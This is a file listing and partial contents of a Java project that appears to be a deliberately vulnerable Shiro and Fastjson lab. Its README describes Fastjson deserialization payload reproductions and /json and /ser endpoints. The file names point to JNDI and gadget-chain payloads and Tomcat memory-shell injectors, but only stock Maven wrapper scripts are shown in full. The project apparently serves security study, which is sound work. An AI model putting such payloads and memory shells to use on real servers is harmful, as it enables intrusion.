├── .gitignore
├── .mvn
    └── wrapper
    │   ├── MavenWrapperDownloader.java
    │   ├── maven-wrapper.jar
    │   └── maven-wrapper.properties
├── README.md
├── mvnw
├── mvnw.cmd
├── pom.xml
└── src
    ├── main
        ├── java
        │   └── com
        │   │   └── shiro
        │   │       └── vuln
        │   │           ├── ShiroAndFastJsonApplication.java
        │   │           ├── controller
        │   │               ├── IndexController.java
        │   │               ├── SerController.java
        │   │               └── UserController.java
        │   │           ├── fastjson
        │   │               ├── Calc.java
        │   │               ├── Fastjson01_JNDI.java
        │   │               ├── Fastjson02_TemplatesImpl.java
        │   │               ├── Fastjson03_Becl.java
        │   │               ├── Fastjson04_JDK11.java
        │   │               ├── Fastjson05_io_write_1.java
        │   │               ├── Fastjson06_io_write_2.java
        │   │               ├── Fastjson07_io_write_3.java
        │   │               ├── Fastjson08_io_write_4.java
        │   │               ├── Fastjson09_io_read.java
        │   │               ├── Fastjson10_io_read_error_dnslog.java
        │   │               ├── Fastjson11_C3P0.java
        │   │               ├── Fastjson12_mysql_1.java
        │   │               ├── Fastjson13_mysql_2.java
        │   │               ├── Fastjson14_mysql_3.java
        │   │               ├── Fastjson15_mysql_4.java
        │   │               ├── Fastjson16_pgsql.java
        │   │               ├── Fastjson17_groovy.java
        │   │               ├── Fastjson18_ajt_read_error_dnslog.java
        │   │               ├── Fastjson19_ajt_read_error_dnslog_2.java
        │   │               ├── Fastjson20_ajt_ognl_io_read_httplog.java
        │   │               ├── Fastjson21_ajt_xalan_dom4j_io_read_httplog.java
        │   │               ├── Fastjson22_ognl_io_read_error_dnslog.java
        │   │               ├── Fastjson23_ognl_io_read_print.java
        │   │               ├── Fastjson24_ognl_io_write_1.java
        │   │               ├── Fastjson25_ognl_io_write_2.java
        │   │               ├── Fastjson26_ognl_io_write_4.java
        │   │               ├── Fastjson27_xalan_dom4j_io_read_error_dnslog.java
        │   │               ├── Fastjson28_xalan_dom4j_io_read_print.java
        │   │               ├── Fastjson29_xalan_dom4j_io_write_1.java
        │   │               ├── Fastjson30_xalan_dom4j_io_write_2.java
        │   │               ├── Fastjson31_xalan_dom4j_io_write_4.java
        │   │               ├── Fastjson32_python_pgsql.java
        │   │               └── TemplatesImplcmd.java
        │   │           ├── filter
        │   │               ├── MemBehinder3.java
        │   │               └── MemBehinderFilter.java
        │   │           └── shiro
        │   │               ├── MainRealm.java
        │   │               └── ShiroConfig.java
        └── resources
        │   └── application.properties
    └── test
        └── java
            ├── TomcatEcho.class
            ├── TomcatEcho.java
            ├── TomcatHeaderSize.class
            ├── TomcatHeaderSize.java
            ├── TomcatMemShellInject.class
            └── TomcatMemShellInject.java


/.gitignore:
--------------------------------------------------------------------------------
 1 | HELP.md
 2 | target/
 3 | !.mvn/wrapper/maven-wrapper.jar
 4 | !**/src/main/**/target/
 5 | !**/src/test/**/target/
 6 | 
 7 | .DS_Store
 8 | 
 9 | ### STS ###
10 | .apt_generated
11 | .classpath
12 | .factorypath
13 | .project
14 | .settings
15 | .springBeans
16 | .sts4-cache
17 | 
18 | ### IntelliJ IDEA ###
19 | .idea
20 | *.iws
21 | *.iml
22 | *.ipr
23 | 
24 | ### NetBeans ###
25 | /nbproject/private/
26 | /nbbuild/
27 | /dist/
28 | /nbdist/
29 | /.nb-gradle/
30 | build/
31 | !**/src/main/**/build/
32 | !**/src/test/**/build/
33 | 
34 | ### VS Code ###
35 | .vscode/
36 | 


--------------------------------------------------------------------------------
/.mvn/wrapper/MavenWrapperDownloader.java:
--------------------------------------------------------------------------------
  1 | /*
  2 |  * Copyright 2007-present the original author or authors.
  3 |  *
  4 |  * Licensed under the Apache License, Version 2.0 (the "License");
  5 |  * you may not use this file except in compliance with the License.
  6 |  * You may obtain a copy of the License at
  7 |  *
  8 |  *      https://www.apache.org/licenses/LICENSE-2.0
  9 |  *
 10 |  * Unless required by applicable law or agreed to in writing, software
 11 |  * distributed under the License is distributed on an "AS IS" BASIS,
 12 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 13 |  * See the License for the specific language governing permissions and
 14 |  * limitations under the License.
 15 |  */
 16 | 
 17 | import java.net.*;
 18 | import java.io.*;
 19 | import java.nio.channels.*;
 20 | import java.util.Properties;
 21 | 
 22 | public class MavenWrapperDownloader {
 23 | 
 24 |     private static final String WRAPPER_VERSION = "0.5.6";
 25 |     /**
 26 |      * Default URL to download the maven-wrapper.jar from, if no 'downloadUrl' is provided.
 27 |      */
 28 |     private static final String DEFAULT_DOWNLOAD_URL = "https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/"
 29 |             + WRAPPER_VERSION + "/maven-wrapper-" + WRAPPER_VERSION + ".jar";
 30 | 
 31 |     /**
 32 |      * Path to the maven-wrapper.properties file, which might contain a downloadUrl property to
 33 |      * use instead of the default one.
 34 |      */
 35 |     private static final String MAVEN_WRAPPER_PROPERTIES_PATH =
 36 |             ".mvn/wrapper/maven-wrapper.properties";
 37 | 
 38 |     /**
 39 |      * Path where the maven-wrapper.jar will be saved to.
 40 |      */
 41 |     private static final String MAVEN_WRAPPER_JAR_PATH =
 42 |             ".mvn/wrapper/maven-wrapper.jar";
 43 | 
 44 |     /**
 45 |      * Name of the property which should be used to override the default download url for the wrapper.
 46 |      */
 47 |     private static final String PROPERTY_NAME_WRAPPER_URL = "wrapperUrl";
 48 | 
 49 |     public static void main(String args[]) {
 50 |         System.out.println("- Downloader started");
 51 |         File baseDirectory = new File(args[0]);
 52 |         System.out.println("- Using base directory: " + baseDirectory.getAbsolutePath());
 53 | 
 54 |         // If the maven-wrapper.properties exists, read it and check if it contains a custom
 55 |         // wrapperUrl parameter.
 56 |         File mavenWrapperPropertyFile = new File(baseDirectory, MAVEN_WRAPPER_PROPERTIES_PATH);
 57 |         String url = DEFAULT_DOWNLOAD_URL;
 58 |         if (mavenWrapperPropertyFile.exists()) {
 59 |             FileInputStream mavenWrapperPropertyFileInputStream = null;
 60 |             try {
 61 |                 mavenWrapperPropertyFileInputStream = new FileInputStream(mavenWrapperPropertyFile);
 62 |                 Properties mavenWrapperProperties = new Properties();
 63 |                 mavenWrapperProperties.load(mavenWrapperPropertyFileInputStream);
 64 |                 url = mavenWrapperProperties.getProperty(PROPERTY_NAME_WRAPPER_URL, url);
 65 |             } catch (IOException e) {
 66 |                 System.out.println("- ERROR loading '" + MAVEN_WRAPPER_PROPERTIES_PATH + "'");
 67 |             } finally {
 68 |                 try {
 69 |                     if (mavenWrapperPropertyFileInputStream != null) {
 70 |                         mavenWrapperPropertyFileInputStream.close();
 71 |                     }
 72 |                 } catch (IOException e) {
 73 |                     // Ignore ...
 74 |                 }
 75 |             }
 76 |         }
 77 |         System.out.println("- Downloading from: " + url);
 78 | 
 79 |         File outputFile = new File(baseDirectory.getAbsolutePath(), MAVEN_WRAPPER_JAR_PATH);
 80 |         if (!outputFile.getParentFile().exists()) {
 81 |             if (!outputFile.getParentFile().mkdirs()) {
 82 |                 System.out.println(
 83 |                         "- ERROR creating output directory '" + outputFile.getParentFile().getAbsolutePath() + "'");
 84 |             }
 85 |         }
 86 |         System.out.println("- Downloading to: " + outputFile.getAbsolutePath());
 87 |         try {
 88 |             downloadFileFromURL(url, outputFile);
 89 |             System.out.println("Done");
 90 |             System.exit(0);
 91 |         } catch (Throwable e) {
 92 |             System.out.println("- Error downloading");
 93 |             e.printStackTrace();
 94 |             System.exit(1);
 95 |         }
 96 |     }
 97 | 
 98 |     private static void downloadFileFromURL(String urlString, File destination) throws Exception {
 99 |         if (System.getenv("MVNW_USERNAME") != null && System.getenv("MVNW_PASSWORD") != null) {
100 |             String username = System.getenv("MVNW_USERNAME");
101 |             char[] password = System.getenv("MVNW_PASSWORD").toCharArray();
102 |             Authenticator.setDefault(new Authenticator() {
103 |                 @Override
104 |                 protected PasswordAuthentication getPasswordAuthentication() {
105 |                     return new PasswordAuthentication(username, password);
106 |                 }
107 |             });
108 |         }
109 |         URL website = new URL(urlString);
110 |         ReadableByteChannel rbc;
111 |         rbc = Channels.newChannel(website.openStream());
112 |         FileOutputStream fos = new FileOutputStream(destination);
113 |         fos.getChannel().transferFrom(rbc, 0, Long.MAX_VALUE);
114 |         fos.close();
115 |         rbc.close();
116 |     }
117 | 
118 | }
119 | 


--------------------------------------------------------------------------------
/.mvn/wrapper/maven-wrapper.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/safe6Sec/ShiroAndFastJson/df004c21bb3df98eeb3eeec177fdfafc7b12c9be/.mvn/wrapper/maven-wrapper.jar


--------------------------------------------------------------------------------
/.mvn/wrapper/maven-wrapper.properties:
--------------------------------------------------------------------------------
1 | distributionUrl=https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.8.1/apache-maven-3.8.1-bin.zip
2 | wrapperUrl=https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.5.6/maven-wrapper-0.5.6.jar
3 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # ShiroAndFastJson
 2 | 
 3 | shiro加fastjson环境
 4 | 
 5 | # 说明
 6 | fastjson包下为各版本payload复现，来自https://github.com/kezibei/fastjson_payload。    
 7 | 我在原项目基础上加了maven相关依赖，以及一点修改。   
 8 | 
 9 | 
10 | 
11 | web复现
12 | 
13 | 路由访问:
14 | 
15 | /login 登录
16 | 
17 | /json json解析
18 | 
19 | /ser 反序列化
20 | 
21 | 


--------------------------------------------------------------------------------
/mvnw:
--------------------------------------------------------------------------------
  1 | #!/bin/sh
  2 | # ----------------------------------------------------------------------------
  3 | # Licensed to the Apache Software Foundation (ASF) under one
  4 | # or more contributor license agreements.  See the NOTICE file
  5 | # distributed with this work for additional information
  6 | # regarding copyright ownership.  The ASF licenses this file
  7 | # to you under the Apache License, Version 2.0 (the
  8 | # "License"); you may not use this file except in compliance
  9 | # with the License.  You may obtain a copy of the License at
 10 | #
 11 | #    https://www.apache.org/licenses/LICENSE-2.0
 12 | #
 13 | # Unless required by applicable law or agreed to in writing,
 14 | # software distributed under the License is distributed on an
 15 | # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 16 | # KIND, either express or implied.  See the License for the
 17 | # specific language governing permissions and limitations
 18 | # under the License.
 19 | # ----------------------------------------------------------------------------
 20 | 
 21 | # ----------------------------------------------------------------------------
 22 | # Maven Start Up Batch script
 23 | #
 24 | # Required ENV vars:
 25 | # ------------------
 26 | #   JAVA_HOME - location of a JDK home dir
 27 | #
 28 | # Optional ENV vars
 29 | # -----------------
 30 | #   M2_HOME - location of maven2's installed home dir
 31 | #   MAVEN_OPTS - parameters passed to the Java VM when running Maven
 32 | #     e.g. to debug Maven itself, use
 33 | #       set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000
 34 | #   MAVEN_SKIP_RC - flag to disable loading of mavenrc files
 35 | # ----------------------------------------------------------------------------
 36 | 
 37 | if [ -z "$MAVEN_SKIP_RC" ] ; then
 38 | 
 39 |   if [ -f /etc/mavenrc ] ; then
 40 |     . /etc/mavenrc
 41 |   fi
 42 | 
 43 |   if [ -f "$HOME/.mavenrc" ] ; then
 44 |     . "$HOME/.mavenrc"
 45 |   fi
 46 | 
 47 | fi
 48 | 
 49 | # OS specific support.  $var _must_ be set to either true or false.
 50 | cygwin=false;
 51 | darwin=false;
 52 | mingw=false
 53 | case "`uname`" in
 54 |   CYGWIN*) cygwin=true ;;
 55 |   MINGW*) mingw=true;;
 56 |   Darwin*) darwin=true
 57 |     # Use /usr/libexec/java_home if available, otherwise fall back to /Library/Java/Home
 58 |     # See https://developer.apple.com/library/mac/qa/qa1170/_index.html
 59 |     if [ -z "$JAVA_HOME" ]; then
 60 |       if [ -x "/usr/libexec/java_home" ]; then
 61 |         export JAVA_HOME="`/usr/libexec/java_home`"
 62 |       else
 63 |         export JAVA_HOME="/Library/Java/Home"
 64 |       fi
 65 |     fi
 66 |     ;;
 67 | esac
 68 | 
 69 | if [ -z "$JAVA_HOME" ] ; then
 70 |   if [ -r /etc/gentoo-release ] ; then
 71 |     JAVA_HOME=`java-config --jre-home`
 72 |   fi
 73 | fi
 74 | 
 75 | if [ -z "$M2_HOME" ] ; then
 76 |   ## resolve links - $0 may be a link to maven's home
 77 |   PRG="$0"
 78 | 
 79 |   # need this for relative symlinks
 80 |   while [ -h "$PRG" ] ; do
 81 |     ls=`ls -ld "$PRG"`
 82 |     link=`expr "$ls" : '.*-> \(.*\)$'`
 83 |     if expr "$link" : '/.*' > /dev/null; then
 84 |       PRG="$link"
 85 |     else
 86 |       PRG="`dirname "$PRG"`/$link"
 87 |     fi
 88 |   done
 89 | 
 90 |   saveddir=`pwd`
 91 | 
 92 |   M2_HOME=`dirname "$PRG"`/..
 93 | 
 94 |   # make it fully qualified
 95 |   M2_HOME=`cd "$M2_HOME" && pwd`
 96 | 
 97 |   cd "$saveddir"
 98 |   # echo Using m2 at $M2_HOME
 99 | fi
100 | 
101 | # For Cygwin, ensure paths are in UNIX format before anything is touched
102 | if $cygwin ; then
103 |   [ -n "$M2_HOME" ] &&
104 |     M2_HOME=`cygpath --unix "$M2_HOME"`
105 |   [ -n "$JAVA_HOME" ] &&
106 |     JAVA_HOME=`cygpath --unix "$JAVA_HOME"`
107 |   [ -n "$CLASSPATH" ] &&
108 |     CLASSPATH=`cygpath --path --unix "$CLASSPATH"`
109 | fi
110 | 
111 | # For Mingw, ensure paths are in UNIX format before anything is touched
112 | if $mingw ; then
113 |   [ -n "$M2_HOME" ] &&
114 |     M2_HOME="`(cd "$M2_HOME"; pwd)`"
115 |   [ -n "$JAVA_HOME" ] &&
116 |     JAVA_HOME="`(cd "$JAVA_HOME"; pwd)`"
117 | fi
118 | 
119 | if [ -z "$JAVA_HOME" ]; then
120 |   javaExecutable="`which javac`"
121 |   if [ -n "$javaExecutable" ] && ! [ "`expr \"$javaExecutable\" : '\([^ ]*\)'`" = "no" ]; then
122 |     # readlink(1) is not available as standard on Solaris 10.
123 |     readLink=`which readlink`
124 |     if [ ! `expr "$readLink" : '\([^ ]*\)'` = "no" ]; then
125 |       if $darwin ; then
126 |         javaHome="`dirname \"$javaExecutable\"`"
127 |         javaExecutable="`cd \"$javaHome\" && pwd -P`/javac"
128 |       else
129 |         javaExecutable="`readlink -f \"$javaExecutable\"`"
130 |       fi
131 |       javaHome="`dirname \"$javaExecutable\"`"
132 |       javaHome=`expr "$javaHome" : '\(.*\)/bin'`
133 |       JAVA_HOME="$javaHome"
134 |       export JAVA_HOME
135 |     fi
136 |   fi
137 | fi
138 | 
139 | if [ -z "$JAVACMD" ] ; then
140 |   if [ -n "$JAVA_HOME"  ] ; then
141 |     if [ -x "$JAVA_HOME/jre/sh/java" ] ; then
142 |       # IBM's JDK on AIX uses strange locations for the executables
143 |       JAVACMD="$JAVA_HOME/jre/sh/java"
144 |     else
145 |       JAVACMD="$JAVA_HOME/bin/java"
146 |     fi
147 |   else
148 |     JAVACMD="`which java`"
149 |   fi
150 | fi
151 | 
152 | if [ ! -x "$JAVACMD" ] ; then
153 |   echo "Error: JAVA_HOME is not defined correctly." >&2
154 |   echo "  We cannot execute $JAVACMD" >&2
155 |   exit 1
156 | fi
157 | 
158 | if [ -z "$JAVA_HOME" ] ; then
159 |   echo "Warning: JAVA_HOME environment variable is not set."
160 | fi
161 | 
162 | CLASSWORLDS_LAUNCHER=org.codehaus.plexus.classworlds.launcher.Launcher
163 | 
164 | # traverses directory structure from process work directory to filesystem root
165 | # first directory with .mvn subdirectory is considered project base directory
166 | find_maven_basedir() {
167 | 
168 |   if [ -z "$1" ]
169 |   then
170 |     echo "Path not specified to find_maven_basedir"
171 |     return 1
172 |   fi
173 | 
174 |   basedir="$1"
175 |   wdir="$1"
176 |   while [ "$wdir" != '/' ] ; do
177 |     if [ -d "$wdir"/.mvn ] ; then
178 |       basedir=$wdir
179 |       break
180 |     fi
181 |     # workaround for JBEAP-8937 (on Solaris 10/Sparc)
182 |     if [ -d "${wdir}" ]; then
183 |       wdir=`cd "$wdir/.."; pwd`
184 |     fi
185 |     # end of workaround
186 |   done
187 |   echo "${basedir}"
188 | }
189 | 
190 | # concatenates all lines of a file
191 | concat_lines() {
192 |   if [ -f "$1" ]; then
193 |     echo "$(tr -s '\n' ' ' < "$1")"
194 |   fi
195 | }
196 | 
197 | BASE_DIR=`find_maven_basedir "$(pwd)"`
198 | if [ -z "$BASE_DIR" ]; then
199 |   exit 1;
200 | fi
201 | 
202 | ##########################################################################################
203 | # Extension to allow automatically downloading the maven-wrapper.jar from Maven-central
204 | # This allows using the maven wrapper in projects that prohibit checking in binary data.
205 | ##########################################################################################
206 | if [ -r "$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" ]; then
207 |     if [ "$MVNW_VERBOSE" = true ]; then
208 |       echo "Found .mvn/wrapper/maven-wrapper.jar"
209 |     fi
210 | else
211 |     if [ "$MVNW_VERBOSE" = true ]; then
212 |       echo "Couldn't find .mvn/wrapper/maven-wrapper.jar, downloading it ..."
213 |     fi
214 |     if [ -n "$MVNW_REPOURL" ]; then
215 |       jarUrl="$MVNW_REPOURL/io/takari/maven-wrapper/0.5.6/maven-wrapper-0.5.6.jar"
216 |     else
217 |       jarUrl="https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.5.6/maven-wrapper-0.5.6.jar"
218 |     fi
219 |     while IFS="=" read key value; do
220 |       case "$key" in (wrapperUrl) jarUrl="$value"; break ;;
221 |       esac
222 |     done < "$BASE_DIR/.mvn/wrapper/maven-wrapper.properties"
223 |     if [ "$MVNW_VERBOSE" = true ]; then
224 |       echo "Downloading from: $jarUrl"
225 |     fi
226 |     wrapperJarPath="$BASE_DIR/.mvn/wrapper/maven-wrapper.jar"
227 |     if $cygwin; then
228 |       wrapperJarPath=`cygpath --path --windows "$wrapperJarPath"`
229 |     fi
230 | 
231 |     if command -v wget > /dev/null; then
232 |         if [ "$MVNW_VERBOSE" = true ]; then
233 |           echo "Found wget ... using wget"
234 |         fi
235 |         if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then
236 |             wget "$jarUrl" -O "$wrapperJarPath"
237 |         else
238 |             wget --http-user=$MVNW_USERNAME --http-password=$MVNW_PASSWORD "$jarUrl" -O "$wrapperJarPath"
239 |         fi
240 |     elif command -v curl > /dev/null; then
241 |         if [ "$MVNW_VERBOSE" = true ]; then
242 |           echo "Found curl ... using curl"
243 |         fi
244 |         if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then
245 |             curl -o "$wrapperJarPath" "$jarUrl" -f
246 |         else
247 |             curl --user $MVNW_USERNAME:$MVNW_PASSWORD -o "$wrapperJarPath" "$jarUrl" -f
248 |         fi
249 | 
250 |     else
251 |         if [ "$MVNW_VERBOSE" = true ]; then
252 |           echo "Falling back to using Java to download"
253 |         fi
254 |         javaClass="$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.java"
255 |         # For Cygwin, switch paths to Windows format before running javac
256 |         if $cygwin; then
257 |           javaClass=`cygpath --path --windows "$javaClass"`
258 |         fi
259 |         if [ -e "$javaClass" ]; then
260 |             if [ ! -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then
261 |                 if [ "$MVNW_VERBOSE" = true ]; then
262 |                   echo " - Compiling MavenWrapperDownloader.java ..."
263 |                 fi
264 |                 # Compiling the Java class
265 |                 ("$JAVA_HOME/bin/javac" "$javaClass")
266 |             fi
267 |             if [ -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then
268 |                 # Running the downloader
269 |                 if [ "$MVNW_VERBOSE" = true ]; then
270 |                   echo " - Running MavenWrapperDownloader.java ..."
271 |                 fi
272 |                 ("$JAVA_HOME/bin/java" -cp .mvn/wrapper MavenWrapperDownloader "$MAVEN_PROJECTBASEDIR")
273 |             fi
274 |         fi
275 |     fi
276 | fi
277 | ##########################################################################################
278 | # End of extension
279 | ##########################################################################################
280 | 
281 | export MAVEN_PROJECTBASEDIR=${MAVEN_BASEDIR:-"$BASE_DIR"}
282 | if [ "$MVNW_VERBOSE" = true ]; then
283 |   echo $MAVEN_PROJECTBASEDIR
284 | fi
285 | MAVEN_OPTS="$(concat_lines "$MAVEN_PROJECTBASEDIR/.mvn/jvm.config") $MAVEN_OPTS"
286 | 
287 | # For Cygwin, switch paths to Windows format before running java
288 | if $cygwin; then
289 |   [ -n "$M2_HOME" ] &&
290 |     M2_HOME=`cygpath --path --windows "$M2_HOME"`
291 |   [ -n "$JAVA_HOME" ] &&
292 |     JAVA_HOME=`cygpath --path --windows "$JAVA_HOME"`
293 |   [ -n "$CLASSPATH" ] &&
294 |     CLASSPATH=`cygpath --path --windows "$CLASSPATH"`
295 |   [ -n "$MAVEN_PROJECTBASEDIR" ] &&
296 |     MAVEN_PROJECTBASEDIR=`cygpath --path --windows "$MAVEN_PROJECTBASEDIR"`
297 | fi
298 | 
299 | # Provide a "standardized" way to retrieve the CLI args that will
300 | # work with both Windows and non-Windows executions.
301 | MAVEN_CMD_LINE_ARGS="$MAVEN_CONFIG $@"
302 | export MAVEN_CMD_LINE_ARGS
303 | 
304 | WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain
305 | 
306 | exec "$JAVACMD" \
307 |   $MAVEN_OPTS \
308 |   -classpath "$MAVEN_PROJECTBASEDIR/.mvn/wrapper/maven-wrapper.jar" \
309 |   "-Dmaven.home=${M2_HOME}" "-Dmaven.multiModuleProjectDirectory=${MAVEN_PROJECTBASEDIR}" \
310 |   ${WRAPPER_LAUNCHER} $MAVEN_CONFIG "$@"
311 | 


--------------------------------------------------------------------------------
/mvnw.cmd:
--------------------------------------------------------------------------------
  1 | @REM ----------------------------------------------------------------------------
  2 | @REM Licensed to the Apache Software Foundation (ASF) under one
  3 | @REM or more contributor license agreements.  See the NOTICE file
  4 | @REM distributed with this work for additional information
  5 | @REM regarding copyright ownership.  The ASF licenses this file
  6 | @REM to you under the Apache License, Version 2.0 (the
  7 | @REM "License"); you may not use this file except in compliance
  8 | @REM with the License.  You may obtain a copy of the License at
  9 | @REM
 10 | @REM    https://www.apache.org/licenses/LICENSE-2.0
 11 | @REM
 12 | @REM Unless required by applicable law or agreed to in writing,
 13 | @REM software distributed under the License is distributed on an
 14 | @REM "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 15 | @REM KIND, either express or implied.  See the License for the
 16 | @REM specific language governing permissions and limitations
 17 | @REM under the License.
 18 | @REM ----------------------------------------------------------------------------
 19 | 
 20 | @REM ----------------------------------------------------------------------------
 21 | @REM Maven Start Up Batch script
 22 | @REM
 23 | @REM Required ENV vars:
 24 | @REM JAVA_HOME - location of a JDK home dir
 25 | @REM
 26 | @REM Optional ENV vars
 27 | @REM M2_HOME - location of maven2's installed home dir
 28 | @REM MAVEN_BATCH_ECHO - set to 'on' to enable the echoing of the batch commands
 29 | @REM MAVEN_BATCH_PAUSE - set to 'on' to wait for a keystroke before ending
 30 | @REM MAVEN_OPTS - parameters passed to the Java VM when running Maven
 31 | @REM     e.g. to debug Maven itself, use
 32 | @REM set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000
 33 | @REM MAVEN_SKIP_RC - flag to disable loading of mavenrc files
 34 | @REM ----------------------------------------------------------------------------
 35 | 
 36 | @REM Begin all REM lines with '@' in case MAVEN_BATCH_ECHO is 'on'
 37 | @echo off
 38 | @REM set title of command window
 39 | title %0
 40 | @REM enable echoing by setting MAVEN_BATCH_ECHO to 'on'
 41 | @if "%MAVEN_BATCH_ECHO%" == "on"  echo %MAVEN_BATCH_ECHO%
 42 | 
 43 | @REM set %HOME% to equivalent of $HOME
 44 | if "%HOME%" == "" (set "HOME=%HOMEDRIVE%%HOMEPATH%")
 45 | 
 46 | @REM Execute a user defined script before this one
 47 | if not "%MAVEN_SKIP_RC%" == "" goto skipRcPre
 48 | @REM check for pre script, once with legacy .bat ending and once with .cmd ending
 49 | if exist "%HOME%\mavenrc_pre.bat" call "%HOME%\mavenrc_pre.bat"
 50 | if exist "%HOME%\mavenrc_pre.cmd" call "%HOME%\mavenrc_pre.cmd"
 51 | :skipRcPre
 52 | 
 53 | @setlocal
 54 | 
 55 | set ERROR_CODE=0
 56 | 
 57 | @REM To isolate internal variables from possible post scripts, we use another setlocal
 58 | @setlocal
 59 | 
 60 | @REM ==== START VALIDATION ====
 61 | if not "%JAVA_HOME%" == "" goto OkJHome
 62 | 
 63 | echo.
 64 | echo Error: JAVA_HOME not found in your environment. >&2
 65 | echo Please set the JAVA_HOME variable in your environment to match the >&2
 66 | echo location of your Java installation. >&2
 67 | echo.
 68 | goto error
 69 | 
 70 | :OkJHome
 71 | if exist "%JAVA_HOME%\bin\java.exe" goto init
 72 | 
 73 | echo.
 74 | echo Error: JAVA_HOME is set to an invalid directory. >&2
 75 | echo JAVA_HOME = "%JAVA_HOME%" >&2
 76 | echo Please set the JAVA_HOME variable in your environment to match the >&2
 77 | echo location of your Java installation. >&2
 78 | echo.
 79 | goto error
 80 | 
 81 | @REM ==== END VALIDATION ====
 82 | 
 83 | :init
 84 | 
 85 | @REM Find the project base dir, i.e. the directory that contains the folder ".mvn".
 86 | @REM Fallback to current working directory if not found.
 87 | 
 88 | set MAVEN_PROJECTBASEDIR=%MAVEN_BASEDIR%
 89 | IF NOT "%MAVEN_PROJECTBASEDIR%"=="" goto endDetectBaseDir
 90 | 
 91 | set EXEC_DIR=%CD%
 92 | set WDIR=%EXEC_DIR%
 93 | :findBaseDir
 94 | IF EXIST "%WDIR%"\.mvn goto baseDirFound
 95 | cd ..
 96 | IF "%WDIR%"=="%CD%" goto baseDirNotFound
 97 | set WDIR=%CD%
 98 | goto findBaseDir
 99 | 
100 | :baseDirFound
101 | set MAVEN_PROJECTBASEDIR=%WDIR%
102 | cd "%EXEC_DIR%"
103 | goto endDetectBaseDir
104 | 
105 | :baseDirNotFound
106 | set MAVEN_PROJECTBASEDIR=%EXEC_DIR%
107 | cd "%EXEC_DIR%"
108 | 
109 | :endDetectBaseDir
110 | 
111 | IF NOT EXIST "%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config" goto endReadAdditionalConfig
112 | 
113 | @setlocal EnableExtensions EnableDelayedExpansion
114 | for /F "usebackq delims=" %%a in ("%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config") do set JVM_CONFIG_MAVEN_PROPS=!JVM_CONFIG_MAVEN_PROPS! %%a
115 | @endlocal & set JVM_CONFIG_MAVEN_PROPS=%JVM_CONFIG_MAVEN_PROPS%
116 | 
117 | :endReadAdditionalConfig
118 | 
119 | SET MAVEN_JAVA_EXE="%JAVA_HOME%\bin\java.exe"
120 | set WRAPPER_JAR="%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.jar"
121 | set WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain
122 | 
123 | set DOWNLOAD_URL="https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.5.6/maven-wrapper-0.5.6.jar"
124 | 
125 | FOR /F "tokens=1,2 delims==" %%A IN ("%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.properties") DO (
126 |     IF "%%A"=="wrapperUrl" SET DOWNLOAD_URL=%%B
127 | )
128 | 
129 | @REM Extension to allow automatically downloading the maven-wrapper.jar from Maven-central
130 | @REM This allows using the maven wrapper in projects that prohibit checking in binary data.
131 | if exist %WRAPPER_JAR% (
132 |     if "%MVNW_VERBOSE%" == "true" (
133 |         echo Found %WRAPPER_JAR%
134 |     )
135 | ) else (
136 |     if not "%MVNW_REPOURL%" == "" (
137 |         SET DOWNLOAD_URL="%MVNW_REPOURL%/io/takari/maven-wrapper/0.5.6/maven-wrapper-0.5.6.jar"
138 |     )
139 |     if "%MVNW_VERBOSE%" == "true" (
140 |         echo Couldn't find %WRAPPER_JAR%, downloading it ...
141 |         echo Downloading from: %DOWNLOAD_URL%
142 |     )
143 | 
144 |     powershell -Command "&{"^
145 | 		"$webclient = new-object System.Net.WebClient;"^
146 | 		"if (-not ([string]::IsNullOrEmpty('%MVNW_USERNAME%') -and [string]::IsNullOrEmpty('%MVNW_PASSWORD%'))) {"^
147 | 		"$webclient.Credentials = new-object System.Net.NetworkCredential('%MVNW_USERNAME%', '%MVNW_PASSWORD%');"^
148 | 		"}"^
149 | 		"[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $webclient.DownloadFile('%DOWNLOAD_URL%', '%WRAPPER_JAR%')"^
150 | 		"}"
151 |     if "%MVNW_VERBOSE%" == "true" (
152 |         echo Finished downloading %WRAPPER_JAR%
153 |     )
154 | )
155 | @REM End of extension
156 | 
157 | @REM Provide a "standardized" way to retrieve the CLI args that will
158 | @REM work with both Windows and non-Windows executions.
159 | set MAVEN_CMD_LINE_ARGS=%*
160 | 
161 | %MAVEN_JAVA_EXE% %JVM_CONFIG_MAVEN_PROPS% %MAVEN_OPTS% %MAVEN_DEBUG_OPTS% -classpath %WRAPPER_JAR% "-Dmaven.multiModuleProjectDirectory=%MAVEN_PROJECTBASEDIR%" %WRAPPER_LAUNCHER% %MAVEN_CONFIG% %*
162 | if ERRORLEVEL 1 goto error
163 | goto end
164 | 
165 | :error
166 | set ERROR_CODE=1
167 | 
168 | :end
169 | @endlocal & set ERROR_CODE=%ERROR_CODE%
170 | 
171 | if not "%MAVEN_SKIP_RC%" == "" goto skipRcPost
172 | @REM check for post script, once with legacy .bat ending and once with .cmd ending
173 | if exist "%HOME%\mavenrc_post.bat" call "%HOME%\mavenrc_post.bat"
174 | if exist "%HOME%\mavenrc_post.cmd" call "%HOME%\mavenrc_post.cmd"
